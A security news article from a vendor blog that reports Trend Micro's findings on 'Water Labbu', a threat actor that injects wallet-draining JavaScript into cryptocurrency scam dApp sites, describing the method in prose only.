ClickCease Hackers compromise scam sites to redirect crypto transactions

Join Our Popular Newsletter

Join 4,500+ Linux & Open Source Professionals!

2x a month. No spam.

Hackers compromise scam sites to redirect crypto transactions

Obanla Opeyemi

October 18, 2022 - TuxCare expert team

According to Trend Micro researchers, a threat actor identified as ‘Water Labbu’ is hacking into cryptocurrency scam sites to inject malicious JavaScript with the aim of stealing money from victims scammed.

It is important to note that ‘dApps’ (decentralized applications) are used for liquidity mining. Liquidity mining means that investors lend their cryptocurrencies to a decentralized exchange in exchange for high returns generated via trading fees.

But fraudsters have developed scam versions of ‘dApps’, which impersonate cryptocurrency liquidity mining services to steal victims’ cryptocurrency investments.

As soon as an investor connects his Waller to the dApp, Water Labbu’s script detects if it contains many cryptocurrencies and, if so, tries to steal it using several methods.

Already Water Labbu is said to have made at least $316,728 in profit from nine identified victims while compromising at least 45 fraudulent websites.

In order to compromise scam sites, the threat actor locates scam sites for cryptocurrencies and injects the “dApps” with malicious scripts that merge easily with the site’s systems.

“In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the “onerror” event, in what is known as an XSS evasion technique to bypass Cross-Site Scripting (XSS) filters. The injected payload then generates another script element that loads another script from the delivery server tmpmeta[.]com,” Trend Micro explained in its report.

Once the balance is above 0.005 ETH or 22,000 USDT, the target becomes valid for Water Labbu, and the script then determines whether the victim is using Windows or a mobile OS (Android, iOS). If the victim is on a mobile device, Water Labbu malicious script sends a transaction authorization request via the dApp website, making it look as if it came from the scam website.

If the recipient agrees to the transaction, the malicious script will empty the wallet of available funds and send it to an address of Water Labbu.

The sources for this piece include an article in BleepingComputer.

Summary
Hackers compromise scam sites to redirect crypto transactions
Article Name
Hackers compromise scam sites to redirect crypto transactions
Description
According to Trend Micro researchers, a threat actor identified as 'Water Labbu' is hacking into cryptocurrency scam sites to inject malicious JavaScript with the aim of stealing money from victims scammed.
Author
Publisher Name
Tuxcare
Publisher Logo

Looking to automate vulnerability patching without kernel reboots, system downtime, or scheduled maintenance windows?

Learn About Live Patching with TuxCare

Related Articles

How GPT models can be...

According to CyberArk researchers, GPT-based models like ChatGPT can be...

January 30, 2023

Attackers actively exploit Unpatched Control...

Malicious hackers have started exploiting a critical vulnerability CVE-2022-44877 in...

January 27, 2023

Attackers distribute malware via malicious...

Deep Instinct researchers reported that RATs like StrRAT and Ratty...

January 26, 2023

CircleCI partners AWS to identify...

According to CircleCI’s CTO, Rob Zuber, CircleCI is working with...

January 25, 2023

Cisco warns of authentication bypass...

A remote attacker could exploit multiple vulnerabilities in four Cisco...

January 24, 2023

IceID malware infiltrates Active Directory...

In a notable IcedID malware attack, the assailant impacted the...

January 23, 2023